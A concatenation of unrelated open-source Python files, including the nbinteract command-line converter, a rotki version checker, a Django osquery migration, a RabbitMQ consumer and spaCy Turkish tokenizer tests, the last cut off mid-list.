self.LayerNorm = ops.LayerNorm(config.hidden_size, eps=1e-12)
self.dropout = ops.Dropout(config.hidden_dropout_prob)
def call(self, hidden_states, input_tensor):
"""Call Bert Self Output."""
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
|
rotkehlchen/utils/version_check.py | rotkehlchenio/rotkehlchen | 137 | 11156322 | from typing import NamedTuple, Optional
from pkg_resources import parse_version
from rotkehlchen.errors.misc import RemoteError
from rotkehlchen.externalapis.github import Github
from rotkehlchen.utils.misc import get_system_spec
class VersionCheckResult(NamedTuple):
our_version: str
latest_version: Optional[str] = None
download_url: Optional[str] = None
def get_current_version(check_for_updates: bool) -> VersionCheckResult:
"""Get current version of rotki. If check_for_updates is set to true it also checks
if a new version is available.
If there is a remote query error return only our version.
If there is no newer version for download returns only our current version and latest version.
If yes returns (our_version_str, latest_version_str, download_url)
"""
our_version_str = get_system_spec()['rotkehlchen']
if check_for_updates:
our_version = parse_version(our_version_str)
github = Github()
try:
latest_version_str, url = github.get_latest_release()
except RemoteError:
# Completely ignore all remote errors. If Github has problems we just don't check now
return VersionCheckResult(our_version=our_version_str)
latest_version = parse_version(latest_version_str)
if latest_version <= our_version:
return VersionCheckResult(
our_version=our_version_str,
latest_version=latest_version_str,
)
return VersionCheckResult(
our_version=our_version_str,
latest_version=latest_version_str,
download_url=url,
)
return VersionCheckResult(our_version=our_version_str)
|
datasets/food101.py | zlapp/CoOp | 317 | 11156327 | import os
from dassl.data.datasets import DATASET_REGISTRY, Datum, DatasetBase
from .oxford_pets import OxfordPets
from .dtd import DescribableTextures as DTD
@DATASET_REGISTRY.register()
class Food101(DatasetBase):
dataset_dir = "food-101"
def __init__(self, cfg):
root = os.path.abspath(os.path.expanduser(cfg.DATASET.ROOT))
self.dataset_dir = os.path.join(root, self.dataset_dir)
self.image_dir = os.path.join(self.dataset_dir, "images")
self.split_path = os.path.join(self.dataset_dir, "split_zhou_Food101.json")
if os.path.exists(self.split_path):
train, val, test = OxfordPets.read_split(self.split_path, self.image_dir)
else:
train, val, test = DTD.read_and_split_data(self.image_dir)
OxfordPets.save_split(train, val, test, self.split_path, self.image_dir)
num_shots = cfg.DATASET.NUM_SHOTS
train = self.generate_fewshot_dataset(train, num_shots=num_shots)
val = self.generate_fewshot_dataset(val, num_shots=min(num_shots, 4))
super().__init__(train_x=train, val=val, test=test)
|
templates/fips-gen.py | mattiasljungstrom/fips | 429 | 11156351 | <reponame>mattiasljungstrom/fips<filename>templates/fips-gen.py
"""
Code generator template file. This is called from a cmake
code generator build target with the full path to a
yaml file which contains detailed code gen params.
"""
import os
import sys
# FIXME PYTHON3
is_python3 = sys.version_info > (3,5)
if is_python3:
import importlib.util
else:
import imp
# template variable will be replaced with
# imported generator paths
gen_paths = [ $genpaths ]
# make imported generator modules visible to python module system
for path in gen_paths :
sys.path.insert(0, path)
# yaml module is under the fips directory
import yaml
from mod import log
import genutil
def processFile(attrs) :
# dynamically load (and execute) the generator module
absPyPath = attrs['generator']
input = attrs['in']
out_src = attrs['out_src']
out_hdr = attrs['out_hdr']
if 'args' in attrs :
args = attrs['args']
else :
args = None
if 'env' in attrs :
env = attrs['env']
else :
env = None
genutil.setEnv(env)
path, script = os.path.split(absPyPath)
sys.path.insert(0, path)
moduleName, ext = os.path.splitext(script)
if is_python3:
module = importlib.import_module(moduleName)
else:
# FIXME PYTHON2
fp, pathname, description = imp.find_module(moduleName)
module = imp.load_module(moduleName, fp, pathname, description)
if args :
module.generate(input, out_src, out_hdr, args)
else :
module.generate(input, out_src, out_hdr)
#=== entry point
if len(sys.argv) == 2 :
with open(sys.argv[1], 'r') as f :
items = yaml.load(f)
for attrs in items :
processFile(attrs)
else :
print('Needs full path to a generator .yml file!')
exit(10)
|
nbinteract/cli.py | bnavigator/nbinteract | 214 | 11156352 | '''Converts notebooks to interactive HTML pages.
Usage:
nbinteract init
nbinteract NOTEBOOKS ...
nbinteract [options] NOTEBOOKS ...
nbinteract (-h | --help)
`nbinteract init` initializes a GitHub project for nbinteract. It
provides guided help to set up a requirements.txt file (if needed) and a Binder
image for the project.
`nbinteract NOTEBOOKS ...` converts notebooks into HTML pages. Note that
running this command outside a GitHub project initialized with `nbinteract
init` requires you to specify the --spec SPEC option.
Arguments:
NOTEBOOKS List of notebooks or folders to convert. If folders are passed in,
all the notebooks in each folder are converted. The resulting HTML
files are created adjacent to their originating notebooks and will
clobber existing files of the same name.
By default, notebooks in subfolders will not be converted; use the
--recursive flag to recursively convert notebooks in subfolders.
Options:
-h --help Show this screen
-s SPEC --spec SPEC BinderHub spec for Jupyter image. Must be in the
format: `{username}/{repo}/{branch}`. For example:
'SamLau95/nbinteract-image/master'. This flag is
**required** unless a .nbinteract.json file exists
in the project root with the "spec" key. If branch
is not specified, default to `master`.
-t TYPE --template TYPE Specifies the type of HTML page to generate. Valid
types: full (standalone page), partial (embeddable
page with library), or plain (embeddable page
without JS).
[default: full]
-B --no-top-button If set, doesn't generate button at top of page.
-r --recursive Recursively convert notebooks in subdirectories.
-o FOLDER --output=FOLDER Outputs HTML files into FOLDER instead of
outputting files adjacent to their originating
notebooks. All files will be direct descendants of
the folder even if --recursive is set.
-i FOLDER --images=FOLDER Extracts images from HTML and writes into FOLDER
instead of encoding images in base64 in the HTML.
Requires -o option to be set as well.
-e --execute Executes the notebook before converting to HTML,
functioning like the equivalent flag for
nbconvert. Configure NbiExecutePreprocessor to
change conversion instead of the base
ExecutePreprocessor.
'''
from docopt import docopt, DocoptExit
from glob import glob
import os
import re
import sys
from textwrap import wrap
import subprocess
import json
import fnmatch
from collections import defaultdict
import nbformat
from traitlets.config import Config
from .exporters import InteractExporter
BLUE = "\033[0;34m"
RED = "\033[91m"
NOCOLOR = "\033[0m"
CONFIG_FILE = '.nbinteract.json'
VALID_TEMPLATES = set(['full', 'plain', 'partial', 'local'])
SPEC_REGEX = re.compile('\S+/\S+(/\S+)?')
BINDER_BASE_URL = 'https://mybinder.org/v2/gh/'
REQUIREMENTS_DOCS = 'http://mybinder.readthedocs.io/en/latest/using.html#id8'
DOCKER_DOCS = 'https://mybinder.readthedocs.io/en/latest/dockerfile.html'
ERROR = 1
SUCCESS = 0
DEFAULT_REQUIREMENTS_TXT = '''
numpy
ipywidgets
nbinteract
'''.strip()
def binder_spec_from_github_url(github_url):
"""
Converts GitHub origin into a Binder spec.
For example:
[email protected]:SamLau95/nbinteract.git -> SamLau95/nbinteract/master
https://github.com/Calebs97/riemann_book -> Calebs97/riemann_book/master
"""
if github_url.endswith('.git'):
github_url = github_url[:-4]
tokens = re.split(r'/|:', github_url)
# The username and reponame are the last two tokens
return '{}/{}/master'.format(tokens[-2], tokens[-1])
def flatmap(fn, iterable, *args, **kwargs):
return [
mapped for item in iterable for mapped in fn(item, *args, **kwargs)
]
def color(text, text_color):
return text_color + text + NOCOLOR
def log(text='', line_length=80, heading='[nbinteract] ', text_color=BLUE):
width = line_length - len(heading)
for line in wrap(text, width, subsequent_indent=' ') or ['']:
print(color(heading, text_color) + line)
def error(text='', line_length=80, heading='[nbinteract] '):
log(text, line_length, heading, text_color=RED)
def yes_or_no(question, default="yes"):
"""Ask a yes/no question via input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is True for "yes" or False for "no".
"""
valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False}
if default is None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
sys.stdout.write(
'{}[nbinteract]{} {}{}'.format(BLUE, NOCOLOR, question, prompt)
)
choice = input().lower()
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
sys.stdout.write(
"Please respond with 'yes' or 'no' "
"(or 'y' or 'n').\n"
)
def main():
"""
Parses command line options and runs nbinteract.
"""
arguments = docopt(__doc__)
if arguments['init']:
return_code = init()
sys.exit(return_code)
run_converter(arguments)
def run_converter(arguments):
"""
Converts notebooks to HTML files. Returns list of output file paths
"""
# Get spec from config file
if os.path.isfile(CONFIG_FILE):
with open(CONFIG_FILE, encoding='utf-8') as f:
config = json.load(f)
arguments['--spec'] = arguments['--spec'] or config['spec']
check_arguments(arguments)
notebooks = flatmap(
expand_folder,
arguments['NOTEBOOKS'],
recursive=arguments['--recursive']
)
exporter = init_exporter(
extract_images=arguments['--images'],
spec=arguments['--spec'],
template_file=arguments['--template'],
button_at_top=(not arguments['--no-top-button']),
execute=arguments['--execute'],
)
log('Converting notebooks to HTML...')
output_files = []
for notebook in notebooks:
output_file = convert(
notebook,
exporter=exporter,
output_folder=arguments['--output'],
images_folder=arguments['--images']
)
output_files.append(output_file)
log('Converted {} to {}'.format(notebook, output_file))
log('Done!')
if arguments['--images']:
log('Resulting images located in {}'.format(arguments['--images']))
return output_files
def init():
'''
Initializes git repo for nbinteract.
1. Checks for requirements.txt or Dockerfile, offering to create a
requirements.txt if needed.
2. Sets the Binder spec using the `origin` git remote in .nbinteract.json.
3. Prints a Binder URL so the user can debug their image if needed.
'''
log('Initializing folder for nbinteract.')
log()
log('Checking to see if this folder is the root folder of a git project.')
if os.path.isdir('.git'):
log("Looks like we're in the root of a git project.")
else:
error(
"This folder doesn't look like the root of a git project. "
"Please rerun nbinteract init in the top-level folder of a "
"git project."
)
return ERROR
log()
log('Checking for requirements.txt or Dockerfile.')
if os.path.isfile('Dockerfile'):
log(
'Dockerfile found. Note that Binder will use the Dockerfile '
'instead of the requirements.txt file, so you should make sure '
'your Dockerfile follows the format in {docker_docs}'
.format(docker_docs=DOCKER_DOCS)
)
elif os.path.isfile('requirements.txt'):
log('requirements.txt found.')
else:
log('No requirements.txt file found.')
yes = yes_or_no(
'Would you like to create a sample requirements.txt file?'
)
if yes:
# TODO(sam): Don't hard-code requirements.txt
with open('requirements.txt', 'w', encoding='utf-8') as f:
f.write(DEFAULT_REQUIREMENTS_TXT)
log(
'Created requirements.txt. Edit this file now to include the '
'rest of your dependencies, then rerun nbinteract init.'
)
return SUCCESS
else:
log(
'Please manually create a requirements.txt file, then rerun '
'nbinteract init.'
)
return SUCCESS
log()
log('Generating .nbinteract.json file...')
if os.path.isfile(CONFIG_FILE):
log(
".nbinteract.json already exists, skipping generation. If you'd "
"like to regenerate the file, remove .nbinteract.json and rerun "
"this command."
)
log()
log("Initialization success!")
return SUCCESS
try:
github_origin = str(
subprocess.check_output(
'git remote get-url origin',
stderr=subprocess.STDOUT,
shell=True
), 'utf-8'
).strip()
except subprocess.CalledProcessError as e:
error(
"No git remote called origin found. Please set up your project's"
"origin remote to point to a GitHub URL.\ngit error: {}".format(e)
)
return ERROR
if 'github' not in github_origin:
error(
"Your project's origin remote {} doesn't look like a github "
"URL. This may cause issues with Binder, so please double check "
"your .nbinteract.json file after this script finishes. "
"Continuing as planned..."
)
binder_spec = binder_spec_from_github_url(github_origin)
with open(CONFIG_FILE, 'w', encoding='utf-8') as f:
json.dump({'spec': binder_spec}, f, indent=4)
log('Created .nbinteract.json file successfully')
log()
log(
'Initialization complete! Now, you should make a git commit with the '
'files created by in this process and push your commits to GitHub.'
)
log()
log(
'After you push, you should visit {} and verify that your Binder '
'image successfully starts.'.format(BINDER_BASE_URL + binder_spec)
)
def check_arguments(arguments):
if not arguments['--spec']:
error(
'--spec flag not set and no .nbinteract.json file found. Rerun '
'this command with the --spec flag or run `nbinteract init` to '
'resolve this issue.'
)
raise DocoptExit()
if not SPEC_REGEX.match(arguments['--spec']):
error(
'Spec must be in the format {username}/{repo}/{branch} but got ' +
arguments['--spec'] + '.\n'
'Exiting...'
)
raise DocoptExit()
if arguments['--images'] and not arguments['--output']:
error(
'If --images is specified, --output must also be specified. '
'Exiting...'
)
raise DocoptExit()
if arguments['--template'] not in VALID_TEMPLATES:
error(
'Unsupported template: "{}". Template must be one of: \n{}'
.format(arguments['--template'], VALID_TEMPLATES)
)
raise DocoptExit()
def expand_folder(notebook_or_folder, recursive=False):
"""
If notebook_or_folder is a folder, returns a list containing all notebooks
in the folder. Otherwise, returns a list containing the notebook name.
If recursive is True, recurses into subdirectories.
"""
is_file = os.path.isfile(notebook_or_folder)
is_dir = os.path.isdir(notebook_or_folder)
if not (is_file or is_dir):
raise ValueError(
'{} is neither an existing file nor a folder.'
.format(notebook_or_folder)
)
if is_file:
return [notebook_or_folder]
# Now we know the input is a directory
if not recursive:
return glob('{}/*.ipynb'.format(notebook_or_folder))
# Recursive case
return [
os.path.join(folder, filename)
for folder, _, filenames in os.walk(notebook_or_folder)
# Skip folders that start with .
if not os.path.basename(folder).startswith('.')
for filename in fnmatch.filter(filenames, '*.ipynb')
]
def init_exporter(extract_images, execute, **exporter_config):
"""
Returns an initialized exporter.
"""
config = Config(InteractExporter=exporter_config)
preprocessors = []
if extract_images:
# Use ExtractOutputPreprocessor to extract the images to separate files
preprocessors.append(
'nbconvert.preprocessors.ExtractOutputPreprocessor'
)
if execute:
# Use the NbiExecutePreprocessor to correctly generate widget output
# for interact() calls.
preprocessors.append('nbinteract.preprocessors.NbiExecutePreprocessor')
config.InteractExporter.preprocessors = preprocessors
exporter = InteractExporter(config=config)
return exporter
def make_exporter_resources(nb_name, out_folder, images_folder=None):
"""
Creates resources dict for the exporter
"""
resources = defaultdict(str)
resources['metadata'] = defaultdict(str)
resources['metadata']['name'] = nb_name
resources['metadata']['path'] = out_folder
# This results in images like AB_5_1.png for a notebook called AB.ipynb
resources['unique_key'] = nb_name
resources['output_files_dir'] = images_folder
return resources
def convert(notebook_path, exporter, output_folder=None, images_folder=None):
"""
Converts notebook into an HTML file, outputting notebooks into
output_folder if set and images into images_folder if set.
Returns the path to the resulting HTML file.
"""
if output_folder:
os.makedirs(output_folder, exist_ok=True)
if images_folder:
os.makedirs(images_folder, exist_ok=True)
# Computes notebooks/ch1 and <name>.ipynb from notebooks/ch1/<name>.ipynb
path, filename = os.path.split(notebook_path)
# Computes <name> from <name>.ipynb
basename, _ = os.path.splitext(filename)
# Computes <name>.html from notebooks/<name>.ipynb
outfile_name = basename + '.html'
# If output_folder is not set, we default to the original folder of the
# notebook.
out_folder = path if not output_folder else output_folder
outfile_path = os.path.join(out_folder, outfile_name)
notebook = nbformat.read(notebook_path, as_version=4)
html, resources = exporter.from_notebook_node(
notebook,
resources=make_exporter_resources(basename, out_folder, images_folder),
)
# Write out HTML
with open(outfile_path, 'w', encoding='utf-8') as outfile:
outfile.write(html)
# Write out images. If images_folder wasn't specified, resources['outputs']
# is None so this loop won't run
for image_path, image_data in resources.get('outputs', {}).items():
with open(image_path, 'wb') as outimage:
outimage.write(image_data)
return outfile_path
if __name__ == '__main__':
main()
|
zentral/contrib/osquery/migrations/0008_auto_20210323_1844.py | janheise/zentral | 634 | 11156381 | # Generated by Django 2.2.18 on 2021-03-23 18:44
import django.contrib.postgres.fields
import django.core.validators
from django.db import migrations, models
from django.db.models import F
def update_osquery_queries(apps, schema_editor):
Pack = apps.get_model("osquery", "Pack")
for pack in Pack.objects.all():
for packquery in pack.packquery_set.all():
platforms = packquery.platforms or pack.platforms
minimum_osquery_version = packquery.minimum_osquery_version or pack.minimum_osquery_version
if platforms or minimum_osquery_version:
packquery.query.platforms = platforms
packquery.query.minimum_osquery_version = minimum_osquery_version
packquery.query.version = F("version") + 1
packquery.query.save()
def update_osquery_enrolled_machine_platform_mask(apps, schema_editor):
try:
from zentral.contrib.inventory.models import MetaMachine
from zentral.contrib.inventory.conf import LINUX, MACOS, WINDOWS
except ImportError:
pass
EnrolledMachine = apps.get_model("osquery", "EnrolledMachine")
for enrolled_machine in EnrolledMachine.objects.all():
mm = MetaMachine(enrolled_machine.serial_number)
if mm.platform:
if mm.platform == LINUX:
enrolled_machine.platform_mask = 0x01 | 0x08
elif mm.platform == MACOS:
enrolled_machine.platform_mask = 0x01 | 0x04 | 0x10
elif mm.platform == WINDOWS:
enrolled_machine.platform_mask = 0x02
else:
print("Unsupported osquery enrolled machine platform", mm.platform)
continue
enrolled_machine.save()
class Migration(migrations.Migration):
dependencies = [
('osquery', '0007_auto_20210215_2159'),
]
operations = [
migrations.AddField(
model_name='distributedquery',
name='minimum_osquery_version',
field=models.CharField(
editable=False, max_length=14, null=True,
validators=[django.core.validators.RegexValidator('^[0-9]{1,4}\\.[0-9]{1,4}\\.[0-9]{1,4}(\\.[0-9]{1,4})?$')]
),
),
migrations.AddField(
model_name='distributedquery',
name='platforms',
field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(choices=[('darwin', 'darwin'), ('freebsd', 'freebsd'), ('linux', 'linux'), ('posix', 'posix'), ('windows', 'windows')], max_length=32), default=list, editable=False, size=None),
),
migrations.AddField(
model_name='query',
name='minimum_osquery_version',
field=models.CharField(
blank=True,
help_text='This query will only execute on osquery versions greater than or equal-to this version string',
max_length=14, null=True,
validators=[django.core.validators.RegexValidator('^[0-9]{1,4}\\.[0-9]{1,4}\\.[0-9]{1,4}(\\.[0-9]{1,4})?$')]
),
),
migrations.AddField(
model_name='query',
name='platforms',
field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(choices=[('darwin', 'darwin'), ('freebsd', 'freebsd'), ('linux', 'linux'), ('posix', 'posix'), ('windows', 'windows')], max_length=32), blank=True, default=list, help_text="Restrict this query to some platforms, default is 'all' platforms", size=None),
),
migrations.RunPython(update_osquery_queries),
migrations.RemoveField(
model_name='pack',
name='minimum_osquery_version',
),
migrations.RemoveField(
model_name='pack',
name='platforms',
),
migrations.RemoveField(
model_name='packquery',
name='minimum_osquery_version',
),
migrations.RemoveField(
model_name='packquery',
name='platforms',
),
migrations.AddField(
model_name='enrolledmachine',
name='platform_mask',
field=models.PositiveSmallIntegerField(default=0),
),
migrations.RunPython(update_osquery_enrolled_machine_platform_mask),
]
|
Examples/6.2.2 Hashing Consumer.py | wangyonghong/RabbitMQ-in-Depth | 111 | 11156402 | <reponame>wangyonghong/RabbitMQ-in-Depth<filename>Examples/6.2.2 Hashing Consumer.py<gh_stars>100-1000
import os
import hashlib
import rabbitpy
# Create the worker queue
queue_name = 'hashing-worker-%s' % os.getpid()
queue = rabbitpy.Queue(channel, queue_name,
auto_delete=True,
durable=False,
exclusive=True)
# Declare the worker queue
if queue.declare():
print('Worker queue declared')
# Bind the worker queue
if queue.bind('fanout-rpc-requests'):
print('Worker queue bound')
# Consume messages from RabbitMQ
for message in queue.consume_messages():
# Create the hashing object
hash_obj = hashlib.md5(message.body)
# Print out the info, this might go into a database or log file
print('Image with correlation-id of %s has a hash of %s' %
(message.properties['correlation_id'],
hash_obj.hexdigest()))
# Acknowledge the delivery of the RPC request message
message.ack()
|
entity/cards/LT21_04H/__init__.py | x014/lushi_script | 102 | 11156407 | # -*- coding: utf-8 -*-
import entity.cards.LT21_04H.LT21_019
import entity.cards.LT21_04H.LT21_020
import entity.cards.LT21_04H.LT21_021
import entity.cards.LT21_04H.LT21_022_
import entity.cards.LT21_04H.LT21_023_
import entity.cards.LT21_04H.LT21_024_
|
spacy/tests/lang/tr/test_tokenizer.py | snosrap/spaCy | 22,040 | 11156410 | import pytest
ABBREV_TESTS = [
("Dr. <NAME> ile görüştüm.", ["Dr.", "Murat", "Bey", "ile", "görüştüm", "."]),
("Dr.la görüştüm.", ["Dr.la", "görüştüm", "."]),
("Dr.'la görüştüm.", ["Dr.'la", "görüştüm", "."]),
("TBMM'de çalışıyormuş.", ["TBMM'de", "çalışıyormuş", "."]),
(
"Hem İst. hem Ank. bu konuda gayet iyi durumda.",
["Hem", "İst.", "hem", "Ank.", "bu", "konuda", "gayet", "iyi", "durumda", "."],
),
(
"Hem İst. hem Ank.'da yağış var.",
["Hem", "İst.", "hem", "Ank.'da", "yağış", "var", "."],
),
("Dr.", ["Dr."]),
("Yrd.Doç.", ["Yrd.Doç."]),
("Prof.'un", ["Prof.'un"]),
("Böl.'nde", ["Böl.'nde"]),
]
URL_TESTS = [
(
"Bizler de www.duygu.com.tr adında bir websitesi kurduk.",
[
"Bizler",
"de",
"www.duygu.com.tr",
"adında",
"bir",
"websitesi",
"kurduk",
".",
],
),
(
"Bizler de https://www.duygu.com.tr adında bir websitesi kurduk.",
[
"Bizler",
"de",
"https://www.duygu.com.tr",
"adında",
"bir",
"websitesi",
"kurduk",
".",
],
),
(
"Bizler de www.duygu.com.tr'dan satın aldık.",
["Bizler", "de", "www.duygu.com.tr'dan", "satın", "aldık", "."],
),
(
"Bizler de https://www.duygu.com.tr'dan satın aldık.",
["Bizler", "de", "https://www.duygu.com.tr'dan", "satın", "aldık", "."],
),
]
NUMBER_TESTS = [
("Rakamla 6 yazılıydı.", ["Rakamla", "6", "yazılıydı", "."]),
("Hava -4 dereceydi.", ["Hava", "-4", "dereceydi", "."]),
(
"Hava sıcaklığı -4ten +6ya yükseldi.",
["Hava", "sıcaklığı", "-4ten", "+6ya", "yükseldi", "."],
),
(
"Hava sıcaklığı -4'ten +6'ya yükseldi.",
["Hava", "sıcaklığı", "-4'ten", "+6'ya", "yükseldi", "."],
),
("Yarışta 6. oldum.", ["Yarışta", "6.", "oldum", "."]),
("Yarışta 438547745. oldum.", ["Yarışta", "438547745.", "oldum", "."]),
("Kitap IV. Murat hakkında.", ["Kitap", "IV.", "Murat", "hakkında", "."]),
# ("Bana söylediği sayı 6.", ["Bana", "söylediği", "sayı", "6", "."]),
("Saat 6'da buluşalım.", ["Saat", "6'da", "buluşalım", "."]),
("Saat 6dan sonra buluşalım.", ["Saat", "6dan", "sonra", "buluşalım", "."]),
("6.dan sonra saymadım.", ["6.dan", "sonra", "saymadım", "."]),
("6.'dan sonra saymadım.", ["6.'dan", "sonra", "saymadım", "."]),
("Saat 6'ydı.", ["Saat", "6'ydı", "."]),
("5'te", ["5'te"]),
("6'da", ["6'da"]),
("9dan", ["9dan"]),
("19'da", ["19'da"]),
("VI'da", ["VI'da"]),
("5.", ["5."]),
("72.", ["72."]),
("VI.", ["VI."]),
("6.'dan", ["6.'dan"]),
("19.'dan", ["19.'dan"]),
("6.dan", ["6.dan"]),
("16.dan", ["16.dan"]),
("VI.'dan", ["VI.'dan"]),
("VI.dan", ["VI.dan"]),
("Hepsi 1994 yılında oldu.", ["Hepsi", "1994", "yılında", "oldu", "."]),
("Hepsi 1994'te oldu.", ["Hepsi", "1994'te", "oldu", "."]),
(
"2/3 tarihli faturayı bulamadım.",
["2/3", "tarihli", "faturayı", "bulamadım", "."],
),
(
"2.3 tarihli faturayı bulamadım.",
["2.3", "tarihli", "faturayı", "bulamadım", "."],
),
(
"2.3. tarihli faturayı bulamadım.",
["2.3.", "tarihli", "faturayı", "bulamadım", "."],
),
(
"2/3/2020 tarihli faturayı bulamadm.",
["2/3/2020", "tarihli", "faturayı", "bulamadm", "."],
),
(
"2/3/1987 tarihinden beri burda yaşıyorum.",
["2/3/1987", "tarihinden", "beri", "burda", "yaşıyorum", "."],
),
(
"2-3-1987 tarihinden beri burdayım.",
["2-3-1987", "tarihinden", "beri", "burdayım", "."],
),
(
"2.3.1987 tarihinden beri burdayım.",
["2.3.1987", "tarihinden", "beri", "burdayım", "."],
),
(
"Bu olay 2005-2006 tarihleri arasında oldu.",
["Bu", "olay", "2005", "-", "2006", "tarihleri", "arasında", "oldu", "."],
),
(
"Bu olay 4/12/2005-21/3/2006 tarihleri arasında oldu.",
[
"Bu",
"olay",
"4/12/2005",
"-",
"21/3/2006",
"tarihleri",
"arasında",
"oldu",
".",
],
),
(
"Ek fıkra: 5/11/2003-4999/3 maddesine göre uygundur.",
[
"Ek",
"fıkra",
":",
"5/11/2003",
"-",
"4999/3",
"maddesine",
"göre",
"uygundur",
".",
],
),
(
"2/A alanları: 6831 sayılı Kanunun 2nci maddesinin birinci fıkrasının (A) bendine göre",
[
"2/A",
"alanları",
":",
"6831",
"sayılı",
"Kanunun",
"2nci",
"maddesinin",
"birinci",
"fıkrasının",
"(",
"A",
")",
"bendine",
"göre",
],
),
(
"ŞEHİTTEĞMENKALMAZ Cad. No: 2/311",
["ŞEHİTTEĞMENKALMAZ", "Cad.", "No", ":", "2/311"],
),
(
"2-3-2025",
[
"2-3-2025",
],
),
("2/3/2025", ["2/3/2025"]),
("Yıllardır 0.5 uç kullanıyorum.", ["Yıllardır", "0.5", "uç", "kullanıyorum", "."]),
(
"Kan değerlerim 0.5-0.7 arasıydı.",
["Kan", "değerlerim", "0.5", "-", "0.7", "arasıydı", "."],
),
("0.5", ["0.5"]),
("1/2", ["1/2"]),
("%1", ["%", "1"]),
("%1lik", ["%", "1lik"]),
("%1'lik", ["%", "1'lik"]),
("%1lik dilim", ["%", "1lik", "dilim"]),
("%1'lik dilim", ["%", "1'lik", "dilim"]),
("%1.5", ["%", "1.5"]),
# ("%1-%2 arası büyüme bekleniyor.", ["%", "1", "-", "%", "2", "arası", "büyüme", "bekleniyor", "."]),
(
"%1-2 arası büyüme bekliyoruz.",
["%", "1", "-", "2", "arası", "büyüme", "bekliyoruz", "."],
),
(
"%11-12 arası büyüme bekliyoruz.",
["%", "11", "-", "12", "arası", "büyüme", "bekliyoruz", "."],
),
("%1.5luk büyüme bekliyoruz.", ["%", "1.5luk", "büyüme", "bekliyoruz", "."]),
(
"Saat 1-2 arası gelin lütfen.",
["Saat", "1", "-", "2", "arası", "gelin", "lütfen", "."],
),
("Saat 15:30 gibi buluşalım.", ["Saat", "15:30", "gibi", "buluşalım", "."]),
("Saat 15:30'da buluşalım.", ["Saat", "15:30'da", "buluşalım", "."]),
("Saat 15.30'da buluşalım.", ["Saat", "15.30'da", "buluşalım", "."]),
("Saat 15.30da buluşalım.", ["Saat", "15.30da", "buluşalım", "."]),
("Saat 15 civarı buluşalım.", ["Saat", "15", "civarı", "buluşalım", "."]),
("9’daki otobüse binsek mi?", ["9’daki", "otobüse", "binsek", "mi", "?"]),
("Okulumuz 3-B şubesi", ["Okulumuz", "3-B", "şubesi"]),
("Okulumuz 3/B şubesi", ["Okulumuz", "3/B", "şubesi"]),
("Okulumuz 3B şubesi", ["Okulumuz", "3B", "şubesi"]),
("Okulumuz 3b şubesi", ["Okulumuz", "3b", "şubesi"]),
(
"<NAME> 20. yüzyılda, 1904-1914 yılları arasında on yıl süren bir reform süreci getirmiştir.",
[
"Antonio",
"Gaudí",
"20.",
"yüzyılda",
",",
"1904",
"-",
"1914",
"yılları",
"arasında",
"on",
"yıl",
"süren",
"bir",
"reform",
"süreci",
"getirmiştir",
".",
],
),
(
"Dizel yakıtın avro bölgesi ortalaması olan 1,165 avroya kıyasla litre başına 1,335 avroya mal olduğunu gösteriyor.",
[
"Dizel",
"yakıtın",
"avro",
"bölgesi",
"ortalaması",
"olan",
"1,165",
"avroya",
"kıyasla",
"litre",
"başına",
"1,335",
"avroya",
"mal",
"olduğunu",
"gösteriyor",
".",
],
),
(
"<NAME>. 1 Ocak 49'da, Sezar'dan Vali'nin kendisini barış dostu ilan ettiği bir bildiri yayınlamıştır.",
[
"Marcus",
"Antonius",
"M.Ö.",
"1",
"Ocak",
"49'da",
",",
"Sezar'dan",
"Vali'nin",
"kendisini",
"barış",
"dostu",
"ilan",
"ettiği",
"bir",
"bildiri",
"yayınlamıştır",
".",
],
),
]
PUNCT_TESTS = [
("Gitmedim dedim ya!", ["Gitmedim", "dedim", "ya", "!"]),
("Gitmedim dedim ya!!", ["Gitmedim", "dedim", "ya", "!", "!"]),
("Gitsek mi?", ["Gitsek", "mi", "?"]),
("Gitsek mi??", ["Gitsek", "mi", "?", "?"]),
("Gitsek mi?!?", ["Gitsek", "mi", "?", "!", "?"]),
(
"Ankara - Antalya arası otobüs işliyor.",
["Ankara", "-", "Antalya", "arası", "otobüs", "işliyor", "."],
),
(
"Ankara-Antalya arası otobüs işliyor.",
["Ankara", "-", "Antalya", "arası", "otobüs", "işliyor", "."],
),
("Sen--ben, ya da onlar.", ["Sen", "--", "ben", ",", "ya", "da", "onlar", "."]),
(
"Senden, benden, bizden şarkısını biliyor musun?",
["Senden", ",", "benden", ",", "bizden", "şarkısını", "biliyor", "musun", "?"],
),
(
"Akif'le geldik, sonra da o ayrıldı.",
["Akif'le", "geldik", ",", "sonra", "da", "o", "ayrıldı", "."],
),
("Bu adam ne dedi şimdi???", ["Bu", "adam", "ne", "dedi", "şimdi", "?", "?", "?"]),
(
"Yok hasta olmuş, yok annesi hastaymış, bahaneler işte...",
[
"Yok",
"hasta",
"olmuş",
",",
"yok",
"annesi",
"hastaymış",
",",
"bahaneler",
"işte",
"...",
],
),
(
"Ankara'dan İstanbul'a ... bir aşk hikayesi.",
["Ankara'dan", "İstanbul'a", "...", "bir", "aşk", "hikayesi", "."],
),
("Ahmet'te", ["Ahmet'te"]),
("İstanbul'da", ["İstanbul'da"]),
]
GENERAL_TESTS = [
(
"1914'teki Endurance seferinde, Sir <NAME>'ın kaptanlığını yaptığı İngiliz Endurance gemisi yirmi sekiz kişi ile Antarktika'yı geçmek üzere yelken açtı.",
[
"1914'teki",
"Endurance",
"seferinde",
",",
"Sir",
"Ernest",
"Shackleton'ın",
"kaptanlığını",
"yaptığı",
"İngiliz",
"Endurance",
"gemisi",
"yirmi",
"sekiz",
"kişi",
"ile",
"Antarktika'yı",
"geçmek",
"üzere",
"yelken",
"açtı",
".",
],
),
(
'Danışılan "%100 Cospedal" olduğunu belirtti.',
["Danışılan", '"', "%", "100", "Cospedal", '"', "olduğunu", "belirtti", "."],
),
(
"1976'da parkur artık kullanılmıyordu; 1990'da ise bir yangın, daha sonraları ahırlarla birlikte yıkılacak olan tahta tribünlerden geri kalanları da yok etmişti.",
[
"1976'da",
"parkur",
"artık",
"kullanılmıyordu",
";",
